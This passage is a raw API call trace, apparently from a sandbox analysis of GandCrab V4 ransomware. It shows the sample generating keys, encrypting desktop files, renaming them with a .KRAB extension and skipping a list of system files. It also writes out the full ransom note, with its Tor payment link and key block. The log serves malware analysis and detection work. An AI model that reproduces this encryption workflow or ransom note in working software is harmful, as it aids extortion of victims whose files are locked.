[0086.644] CryptGenRandom (in: hProv=0x1010b50, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0086.644] CryptReleaseContext (hProv=0x1010b50, dwFlags=0x0) returned 1 [0086.644] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.644] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011898) returned 1 [0086.646] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.646] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.647] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.647] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0086.647] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0086.647] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.647] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010f08) returned 1 [0086.648] CryptImportKey (in: hProv=0x1010f08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1022ff8) returned 1 [0086.648] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0086.649] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0086.649] GetLastError () returned 0x0 [0086.649] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0086.649] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0086.649] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011898) returned 1 [0086.650] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10230f8) returned 1 [0086.650] CryptGetKeyParam (in: hKey=0x10230f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0086.651] CryptEncrypt (in: hKey=0x10230f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0086.651] GetLastError () returned 0x0 [0086.651] CryptDestroyKey (hKey=0x10230f8) returned 1 [0086.651] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0086.651] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\wcwUc CH.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\nh5wzan7jgsr5ha\\wcwuc ch.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0086.651] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.652] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.652] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x502d, lpOverlapped=0x0) returned 1 [0086.666] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffafd3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.666] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x502d, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x502d, lpOverlapped=0x0) returned 1 [0086.667] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0086.667] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.670] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.671] CloseHandle (hObject=0x43c) returned 1 [0086.673] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.674] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\wcwUc CH.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\nh5wzan7jgsr5ha\\wcwuc ch.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\wcwUc CH.bmp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\nh5wzan7jgsr5ha\\wcwuc ch.bmp.krab")) returned 1 [0086.677] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.677] FindNextFileW (in: hFindFile=0x1023278, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0086.677] lstrcmpW (lpString1="zx 64PABn.flv", lpString2=".") returned 1 [0086.677] lstrcmpW (lpString1="zx 64PABn.flv", lpString2="..") returned 1 [0086.677] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\", lpString2="zx 64PABn.flv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\zx 64PABn.flv") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\zx 64PABn.flv" [0086.677] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.678] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\zx 64PABn.flv.KRAB") returned 80 [0086.678] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\zx 64PABn.flv") returned 75 [0086.678] lstrlenW (lpString=".flv") returned 4 [0086.678] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.678] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".flv ") returned 5 [0086.678] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.678] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\zx 64PABn.flv") returned 75 [0086.678] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\zx 64PABn.flv") returned 75 [0086.679] lstrcmpiW (lpString1="zx 64PABn.flv", lpString2="desktop.ini") returned 1 [0086.679] lstrcmpiW (lpString1="zx 64PABn.flv", lpString2="autorun.inf") returned 1 [0086.679] lstrcmpiW (lpString1="zx 64PABn.flv", lpString2="ntuser.dat") returned 1 [0086.679] lstrcmpiW (lpString1="zx 64PABn.flv", lpString2="iconcache.db") returned 1 [0086.679] lstrcmpiW (lpString1="zx 64PABn.flv", lpString2="bootsect.bak") returned 1 [0086.679] lstrcmpiW (lpString1="zx 64PABn.flv", lpString2="boot.ini") returned 1 [0086.679] lstrcmpiW (lpString1="zx 64PABn.flv", lpString2="ntuser.dat.log") returned 1 [0086.679] lstrcmpiW (lpString1="zx 64PABn.flv", lpString2="thumbs.db") returned 1 [0086.679] lstrcmpiW (lpString1="zx 64PABn.flv", lpString2="KRAB-DECRYPT.html") returned 1 [0086.679] lstrcmpiW (lpString1="zx 64PABn.flv", lpString2="KRAB-DECRYPT.txt") returned 1 [0086.679] lstrcmpiW (lpString1="zx 64PABn.flv", lpString2="CRAB-DECRYPT.txt") returned 1 [0086.679] lstrcmpiW (lpString1="zx 64PABn.flv", lpString2="ntldr") returned 1 [0086.679] lstrcmpiW (lpString1="zx 64PABn.flv", lpString2="NTDETECT.COM") returned 1 [0086.679] lstrcmpiW (lpString1="zx 64PABn.flv", lpString2="Bootfont.bin") returned 1 [0086.679] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.679] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010f90) returned 1 [0086.681] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.681] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.682] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.682] CryptGenRandom (in: hProv=0x1010f90, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0086.682] CryptReleaseContext (hProv=0x1010f90, dwFlags=0x0) returned 1 [0086.682] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.682] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011458) returned 1 [0086.683] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.684] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.684] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.684] CryptGenRandom (in: hProv=0x1011458, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0086.684] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0086.684] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.685] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x10112c0) returned 1 [0086.686] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10235f8) returned 1 [0086.686] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0086.686] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0086.686] GetLastError () returned 0x0 [0086.687] CryptDestroyKey (hKey=0x10235f8) returned 1 [0086.687] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0086.687] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010a40) returned 1 [0086.688] CryptImportKey (in: hProv=0x1010a40, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1022ff8) returned 1 [0086.688] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0086.688] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0086.689] GetLastError () returned 0x0 [0086.689] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0086.689] CryptReleaseContext (hProv=0x1010a40, dwFlags=0x0) returned 1 [0086.689] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\zx 64PABn.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\nh5wzan7jgsr5ha\\zx 64pabn.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0086.689] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.690] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.690] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0xee2f, lpOverlapped=0x0) returned 1 [0086.705] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffff11d1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.705] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xee2f, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0xee2f, lpOverlapped=0x0) returned 1 [0086.705] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0086.705] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.709] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.710] CloseHandle (hObject=0x43c) returned 1 [0086.711] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.712] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\zx 64PABn.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\nh5wzan7jgsr5ha\\zx 64pabn.flv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\zx 64PABn.flv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\nh5wzan7jgsr5ha\\zx 64pabn.flv.krab")) returned 1 [0086.714] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.715] FindNextFileW (in: hFindFile=0x1023278, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0086.715] FindClose (in: hFindFile=0x1023278 | out: hFindFile=0x1023278) returned 1 [0086.715] CloseHandle (hObject=0x474) returned 1 [0086.717] FindNextFileW (in: hFindFile=0x10231f8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0086.717] lstrcmpW (lpString1="wH1O8nYfPk", lpString2=".") returned 1 [0086.717] lstrcmpW (lpString1="wH1O8nYfPk", lpString2="..") returned 1 [0086.717] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\", lpString2="wH1O8nYfPk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk" [0086.717] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\" [0086.717] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0086.717] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0086.718] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0086.718] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0086.718] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0086.718] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.718] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.718] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\\\KRAB-DECRYPT.txt") returned 74 [0086.718] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\wh1o8nyfpk\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0086.721] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0086.721] WriteFile (in: hFile=0x474, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0086.721] CloseHandle (hObject=0x474) returned 1 [0086.723] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.723] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.724] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x21, wMilliseconds=0x39c)) [0086.724] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.724] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0086.724] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0086.724] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\d2ca4a08d2ca4dee3d.lock") returned 80 [0086.724] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\wh1o8nyfpk\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x474 [0086.727] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.727] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.728] lstrlenW 